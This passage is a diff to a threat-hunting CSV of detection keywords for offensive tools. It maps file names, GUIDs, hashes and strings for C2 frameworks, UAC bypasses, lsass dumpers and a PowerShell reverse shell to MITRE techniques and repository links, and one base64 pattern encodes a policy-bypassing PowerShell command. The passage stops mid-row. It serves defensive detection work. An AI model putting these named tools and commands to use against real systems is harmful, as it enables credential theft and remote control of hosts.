generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","10","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" -"*c2server_arm_musl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_armv7*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_debug*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_linux*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_macos*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_release*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_windows*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_arm_musl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_armv7*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_debug*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_linux*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_macos*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_release*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_windows*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" "*C2TaskMessage.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*c2VydmVyMS5jaWEuZ292*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*C2WebSocketHandler.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*C526B877-6AFF-413C-BC03-1837FB63BC22*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*c708b83f-4167-4b4c-a1db-d2011ecb3200*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*C7E4B529-6372-449A-9184-74E74E432FE8*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"*C8482002-F594-4C28-9C46-960B036540A8*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*C8482002-F594-4C28-9C46-960B036540A8*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*cache_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "*cachedump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -8249,8 +8396,8 @@ "*CACTUSTORCH.vba*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbe*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbs*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" -"*caffix*amass*","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10153","1759","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" -"*caffix/amass*","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10153","1759","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*caffix*amass*","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*caffix/amass*","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" "*calebstewart/pwncat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*-CalendarNTLMLeak*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*CALLBACK_HASHDUMP*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" @@ -8260,36 +8407,36 @@ "*CALLBACK_TOKEN_STOLEN*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*CallBackDump*dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*CallbackDump.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" -"*can_flood_frames*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*can_flood_frames*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 